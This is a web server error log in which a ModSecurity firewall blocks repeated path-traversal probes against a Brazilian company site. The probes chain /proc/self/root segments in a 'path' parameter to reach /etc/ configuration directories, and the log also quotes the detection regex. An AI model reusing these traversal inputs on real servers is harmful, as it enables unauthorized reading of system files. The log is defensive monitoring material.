[Thu Mar 19 06:57:39.544523 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:35238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIkxkFeYa1D6dYQnDQ3gAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:57:44.599201 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:35250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvImAkwaGbbGflqUZCblQAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:57:49.145777 2026] [proxy_fcgi:error] [pid 27403:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45230] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:57:50.976279 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:42920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIneoXxyEfFpUF8f_xEAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:57:53.144820 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.243.128:42922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIoRkFeYa1D6dYQnDQ6QAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:58:02.533752 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:42930] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIquoXxyEfFpUF8f_xFgAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:58:08.771221 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.243.128:60748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIsAbLMZ6AikZjR9U-TwAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:58:13.154485 2026] [proxy_fcgi:error] [pid 19093:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45828] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:58:15.931514 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:52694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvItwkwaGbbGflqUZCbuwAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:58:22.061383 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:60316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIvsdf6f5d65gmYZRVpwAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:58:30.150978 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.243.128:49986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIxhkFeYa1D6dYQnDRAQAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:58:30.251230 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.244.43:49530] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvIxgkwaGbbGflqUZCbxgAAAM8"]
[Thu Mar 19 06:58:37.137850 2026] [proxy_fcgi:error] [pid 15826:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46504] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:58:38.744073 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.243.128:49990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIzl_V7PWP6ixUYl6dgAAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:58:39.545130 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.243.128:49990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIz1_V7PWP6ixUYl6dgQAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:58:40.668718 2026] [:error] [pid 19093:tid 140411574073088] [client 74.7.243.128:49990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvI0F_V7PWP6ixUYl6dhAAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:58:47.303352 2026] [:error] [pid 19093:tid 140411607643904] [client 74.7.243.128:48820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvI11_V7PWP6ixUYl6dkAAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:58:54.826856 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:43956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvI3uoXxyEfFpUF8f_xOQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:59:00.461468 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.243.128:40556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvI5BkFeYa1D6dYQnDRCgAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:59:02.661821 2026] [proxy_fcgi:error] [pid 27293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47140] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:59:07.057975 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:40566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvI6eyqAr6etmhZHNpE8QAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:59:11.136791 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.243.128:46350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvI71_V7PWP6ixUYl6dnAAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:59:17.674322 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:46358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvI9fu8EFLIOrSqIpuDAAAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:59:24.144617 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:39758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvI_Na6ubjKNq_cu4Yp4gAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:59:26.813810 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47786] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:59:30.824036 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:39762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJANa6ubjKNq_cu4Yp6wAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
